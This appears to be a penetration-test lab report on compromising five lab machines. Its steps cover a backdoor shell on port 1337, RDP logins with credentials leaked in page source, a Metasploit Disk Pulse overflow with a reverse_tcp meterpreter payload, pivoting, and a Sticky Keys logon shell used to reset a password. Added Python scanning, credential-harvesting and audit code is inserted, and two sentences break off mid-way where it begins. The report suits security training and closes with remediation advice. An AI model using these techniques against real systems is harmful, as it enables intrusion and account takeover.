Summary
Exploitation
Box #1
Box #2
Box #3
Box #4
Box #5
Recommendation
Reference
Summary
This lab report documents a penetration test against five target machines and shows how each one was compromised. The team attacks the five targets in turn, and the report records the progress on each machine and the method used against it. The work falls into three phases. The first is information gathering, to find out which hosts on the network are live. The second is a port scan of those hosts to find the ones with open ports, since an exposed service is what makes a host vulnerable and attackable. The third is exploitation: the port scan results are used to choose an approach for each system and to attack it.
Information Gathering
1. 10.113.113.1
2. 10.113.113.10
3. 10.113.113.15
4. 10.113.113.20
5. 10.113.113.50
6. 10.113.113.51
7. 10.113.113.100
8. 10.113.113.101
9. 10.113.113.102
10. 10.113.113.103
11. 10.113.113.105
12. 10.113.113.108
13. 10.113.113.109
14. 10.113.113.110
15. 10.113.113.112
16. 10.113.113.113
17. 10.113.113.114
18. 10.113.113.115
19. 10.113.113.116
The above is the list of all machines found on the 10.113.113.0/24 network. Five of them have open ports and a weakness that can be attacked; they were selected for further action and are the five boxes covered in the Exploitation section below. The port scan shows that these five machines expose services, which makes them vulnerable to some degree and attackable. It allows us to know exactly
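The port scan and the first look at an unknown port are the two steps the report relies on but does not show. The following is an added example, not the lab's own tooling: a TCP connect scan with a banner grab, plus a one-command probe of a port that answers like a shell. It turns "1337/tcp unknown" in an nmap listing into "1337/tcp is a backdoor that runs commands". The stand-in server, its banner and its `whoami` answer are constructed so the example runs offline; host and port values are whatever you pass in.

```python
import socket
import socketserver
import threading

# Added example, not the lab's own tooling: a TCP connect scan with a banner
# grab, plus a one-command probe of a port that answers like a shell. The
# stand-in server below is constructed so the example runs offline.

BANNER = b"backdoor ready\r\n"   # constructed banner for the stand-in server


def scan_port(host, port, timeout=1.0):
    """Connect-scan one port. Returns (is_open, banner_text); a silent but open
    port still reports open with an empty banner."""
    try:
        sock = socket.create_connection((host, port), timeout=timeout)
    except OSError:                      # refused, unreachable, or timed out
        return False, ""
    with sock:
        sock.settimeout(timeout)
        try:
            data = sock.recv(1024)
        except socket.timeout:
            data = b""
    return True, data.decode("latin-1", "replace").strip()


def scan_ports(host, ports, timeout=1.0):
    """Connect-scan several ports; returns {port: banner} for the open ones."""
    found = {}
    for port in ports:
        is_open, banner = scan_port(host, port, timeout)
        if is_open:
            found[port] = banner
    return found


def probe_shell(host, port, command, timeout=2.0):
    """Treat the port as a command shell: connect, discard any banner, send one
    command and return whatever comes back (the nc/telnet step from Box #1)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.settimeout(timeout)
        try:
            sock.recv(1024)              # banner, if the service sends one
        except socket.timeout:
            pass
        sock.sendall(command.encode("latin-1") + b"\r\n")
        chunks = []
        while True:
            try:
                chunk = sock.recv(4096)
            except socket.timeout:
                break
            if not chunk:                # peer closed the connection
                break
            chunks.append(chunk)
    return b"".join(chunks).decode("latin-1", "replace").strip()


class _FakeBackdoor(socketserver.StreamRequestHandler):
    """Constructed stand-in for the port-1337 backdoor: sends a banner, answers
    exactly one command, then hangs up. Not a real service."""

    def handle(self):
        self.wfile.write(BANNER)
        line = self.rfile.readline().strip().decode("latin-1")
        if not line:                     # scanner disconnected without a command
            return
        if line == "whoami":
            self.wfile.write(b"fake-backdoor-user\r\n")
        else:
            self.wfile.write(b"'" + line.encode("latin-1") + b"' is not recognized\r\n")


def start_fake_backdoor():
    """Start the stand-in on an ephemeral loopback port; returns (server, port).
    Call server.shutdown() when done."""
    server = socketserver.TCPServer(("127.0.0.1", 0), _FakeBackdoor)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


if __name__ == "__main__":
    server, port = start_fake_backdoor()
    print("open ports:", scan_ports("127.0.0.1", [port]))
    print("whoami ->", probe_shell("127.0.0.1", port, "whoami"))
    server.shutdown()
```

Against a real host you would call `scan_ports("10.113.113.10", range(1, 65536))` and then `probe_shell` only on ports whose banner or nmap service guess looks like a shell; a connect scan is noisy and slow compared to nmap, but it is enough to confirm that an "unknown" port actually executes what it is sent.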
Exploitation
Box #1
Address: 10.113.113.10
I used telnet to connect to 10.113.113.10 on port 1337 because the nmap scan listed 1337 as an unknown service. The port is a backdoor that hands out a command shell, so netcat (nc) could equally be used to get access to host 10.113.113.10. Once inside the console I browsed the C:\ drive of the machine and found a text file with a hint on how to reach the next target.
Box #2
Address: 10.113.113.15
Looking through the page source of the website on 10.113.113.15 shows that the user saved the username and password for their workstation login in the HTML. Since port 3389 is open on this machine, RDP can be used to connect remotely with the credentials found in the page source. Run rdesktop 10.113.113.15 to reach the login screen of box 2 and enter admin as the user name and Th1sIS@SecureP@ssw0rd as the password to get access to the machine. A text file on the desktop describes the extra step needed to get to the next box.
Box #3
Address: 10.113.113.20
Following the last hint, go to Exploit-DB, look for DiskPulse_Enterprise_9.9.16_GETBuffer (the Disk Pulse Enterprise 9.9.16 GET buffer overflow module) and download it. Add the module to Metasploit, start msfconsole and use it against the host: set RHOST 10.113.113.20 selects the target, and show options confirms that it has been set. Use set PAYLOAD windows/meterpreter/reverse_tcp to choose the payload, then set LHOST to your own address, which is where the reverse shell connects back to. A successful exploit drops you into a meterpreter session; entering shell gives a command prompt on the machine, and sysinfo reports information about the system.
Box #4
Address: 10.113.113.50
The plan is to use the meterpreter session on box 3 and portfwd to set up a pivot point for attacking box 4. Looking through the page source of the website on 10.113.113.50, there is a unique string that appears to be base64 encoded. We searched DuckDuckGo for the string and the result confirmed that it is base64; decoding it locally with base64 -d is the quicker check. I used box #3 (10.113.113.20) as the pivot between my machine and box 4. I then decoded the string from the page source and used it as the login password for the server. I connected to the server over port 3389 with rdesktop 10.113.113.50 and logged in with those credentials. The user name for the server is administrator and the password is the decoded form of the encoded string found on the
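Boxes #2 and #4 were both opened with secrets left in page source: a plain username and password on box #2, a base64-encoded password on box #4. The following is an added example, not part of the lab report, of a page-source credential sweep that covers both cases: it pulls HTML comments, hidden form fields and base64-looking tokens out of the source and decodes the tokens locally instead of searching the web for them. SAMPLE_HTML and every value in it are constructed for this example.

```python
import base64
import re
from html.parser import HTMLParser

# Added example, not part of the lab report: sweep page source for the three
# places developers leave secrets (comments, hidden inputs, visible text) and
# decode any base64-looking token locally. SAMPLE_HTML is constructed.

CRED_WORDS = ("user", "login", "pass", "pwd", "cred", "admin", "token", "key", "secret")

# A run of 12+ base64 characters not glued to other base64 characters.
B64_RE = re.compile(r"(?<![A-Za-z0-9+/=])[A-Za-z0-9+/]{12,}={0,2}(?![A-Za-z0-9+/=])")

SAMPLE_HTML = """<html><head><title>Workstation portal</title></head>
<body>
<!-- TODO remove before go-live: login user=admin pass=ExampleOnly123 -->
<form action="/login" method="post">
  <input type="hidden" name="api_token" value="deadbeef">
  <input type="text" name="username">
  <input type="password" name="password">
</form>
<p>Backup key: UGFzc3dvcmQxMjM0</p>
</body></html>
"""


class _SourceWalker(HTMLParser):
    """Collects comments, hidden inputs and visible text from the source."""

    def __init__(self):
        super().__init__()
        self.comments, self.hidden, self.text = [], [], []

    def handle_comment(self, data):
        self.comments.append(data.strip())

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and (a.get("type") or "").lower() == "hidden":
            self.hidden.append((a.get("name") or "", a.get("value") or ""))

    def handle_data(self, data):
        if data.strip():
            self.text.append(data.strip())


def decode_if_base64(token):
    """Return the decoded text if token is strict base64 of printable UTF-8,
    otherwise None (ordinary words fail the length or alphabet check)."""
    try:
        raw = base64.b64decode(token, validate=True)
        text = raw.decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if text and text.isprintable() else None


def harvest_credentials(html):
    """Return (kind, detail) findings that deserve a manual look."""
    walker = _SourceWalker()
    walker.feed(html)
    findings = []
    for comment in walker.comments:
        if any(w in comment.lower() for w in CRED_WORDS):
            findings.append(("comment", comment))
    for name, value in walker.hidden:
        if any(w in name.lower() for w in CRED_WORDS):
            findings.append(("hidden-input", f"{name}={value}"))
    for chunk in walker.comments + walker.text + [v for _, v in walker.hidden]:
        for token in B64_RE.findall(chunk):
            decoded = decode_if_base64(token)
            if decoded is not None:
                findings.append(("base64", f"{token} -> {decoded}"))
    return findings


if __name__ == "__main__":
    for kind, detail in harvest_credentials(SAMPLE_HTML):
        print(f"[{kind}] {detail}")
```

The base64 check is a filter, not a verdict: any 12+ character token whose length is a multiple of four and that happens to decode to printable text will be listed, so the output is a short list to read by hand rather than a list of confirmed credentials. Feed it the saved source of each target's site (for example the output of curl -s http://10.113.113.50/) rather than the rendered page, since comments and hidden fields never appear in the rendered view.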
Box #5
Address: 10.113.113.51
The port scan shows that port 3389 (RDP) is open, so we can connect remotely as for boxes #2 and #4. At the Windows 10 logon screen we pressed the Shift key five times, which triggers the Sticky Keys accessibility helper; on this machine that opened a command prompt, meaning the helper had been replaced with a shell. net user lists the accounts on the machine; the account present is oldchap, which is the administrator account. net user can also reset its password: net user oldchap 123456 sets the password for oldchap to 123456. Log in with those credentials to get access to the machine.
Recommendation
I recommend that the company check for and remove any backdoor that has been left open. Box #1 had a backdoor listening on port 1337 that gave a shell to anyone who connected with nc or telnet. For box #2, it is not a good idea to put the credentials of an admin account into a web page on a system with RDP (port 3389) exposed, because anyone who reads the page source can connect to the machine and log in with them. Box #3 is the most secure of the set, but having Disk Pulse Enterprise 9.9.16 installed makes it vulnerable, since an exploit written specifically for that version is publicly available on Exploit-DB; I was able to exploit the box over port 80 with the downloaded module, so the software should be patched or removed. I then set up a pivot through box #3 to attack box #4, whose administrator password was stored base64 encoded in the website source. Base64 is an encoding, not encryption, so the string decodes straight back to the password; credentials must not be stored in page source in any form. Box #5 could be logged into simply by resetting an account password from the command prompt reached through the Sticky Keys shortcut at the logon screen. The fix is to restore the original accessibility binaries (sethc.exe and its siblings) in System32 and remove any Image File Execution Options debugger entries pointing at them, to disable the Sticky Keys shortcut at the logon screen, and to require Network Level Authentication for RDP so that the logon screen is not reachable before authentication. Together these make sure that nobody can get a command prompt without first logging into the machine.
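The Sticky Keys trick on box #5 only works when the accessibility helper has been tampered with, and that tampering is easy to audit. The following is an added example, not part of the lab report, of the two checks a defender would run: whether any accessibility binary is byte-identical to a shell (the copy-cmd.exe-over-sethc.exe swap) and whether an Image File Execution Options (IFEO) "Debugger" value has been hung on one of them. The System32 contents and the `reg export` text are constructed stand-ins; on a real host you would feed in the actual file bytes and the actual export.

```python
import hashlib
import re

# Added example, not part of the lab report: audit for the two ways the
# Sticky Keys logon-screen shell is planted. FAKE_SYSTEM32 and FAKE_REG_EXPORT
# are constructed stand-ins, not data from any real machine.

ACCESSIBILITY_TOOLS = {"sethc.exe", "utilman.exe", "osk.exe", "narrator.exe",
                       "magnify.exe", "displayswitch.exe", "atbroker.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
IFEO_PATH = "\\image file execution options\\"

# Constructed stand-ins (not real binaries): sethc.exe carries the same bytes
# as cmd.exe, i.e. it has been overwritten; osk.exe is untouched.
FAKE_SYSTEM32 = {
    "cmd.exe":        b"MZ constructed cmd.exe stand-in",
    "powershell.exe": b"MZ constructed powershell.exe stand-in",
    "sethc.exe":      b"MZ constructed cmd.exe stand-in",
    "osk.exe":        b"MZ constructed osk.exe stand-in",
}

# Constructed `reg export` of the IFEO key: utilman.exe is hooked, while
# notepad.exe has a debugger entry that is not an accessibility helper.
FAKE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe]
"Debugger"="C:\\Windows\\System32\\cmd.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"Debugger"="C:\\Tools\\debugger.exe"
"""


def _sha256(data):
    return hashlib.sha256(data).hexdigest()


def find_replaced_binaries(system32):
    """system32: {filename: bytes}. Flags accessibility helpers whose content
    is byte-identical to a shell binary."""
    shell_hashes = {_sha256(system32[s]): s for s in sorted(SHELLS) if s in system32}
    findings = []
    for name in sorted(ACCESSIBILITY_TOOLS):
        if name not in system32:
            continue
        digest = _sha256(system32[name])
        if digest in shell_hashes:
            findings.append(f"{name} is byte-identical to {shell_hashes[digest]}")
    return findings


def find_ifeo_debuggers(reg_export):
    """Parse `reg export` text and flag Debugger values under IFEO subkeys that
    name an accessibility helper. The .reg format doubles backslashes inside
    string values, so they are folded back before reporting."""
    findings = []
    current_key = None
    for raw in reg_export.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current_key = line[1:-1]
            continue
        m = re.match(r'"Debugger"="(.*)"$', line)
        if not (m and current_key and IFEO_PATH in current_key.lower()):
            continue
        target = current_key.rsplit("\\", 1)[-1].lower()
        if target in ACCESSIBILITY_TOOLS:
            debugger = m.group(1).replace("\\\\", "\\")
            findings.append(f"IFEO Debugger on {target}: {debugger}")
    return findings


def audit_accessibility_backdoors(system32, reg_export):
    """Run both checks; an empty list means neither technique is present."""
    return find_replaced_binaries(system32) + find_ifeo_debuggers(reg_export)


if __name__ == "__main__":
    for finding in audit_accessibility_backdoors(FAKE_SYSTEM32, FAKE_REG_EXPORT):
        print("FINDING:", finding)
```

On the target itself the inputs come from reading the files under C:\Windows\System32 and from reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" ifeo.reg. Comparing against the host's own cmd.exe catches the plain copy swap; comparing each helper's hash against a known-good copy from the same Windows build also catches a replacement with some other program, and is the stronger check.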
Reference
Metasploit. (2017, September 21). Disk Pulse Enterprise 9.9.16 - GET Buffer Overflow. Exploit-DB. db.com/exploits/42767/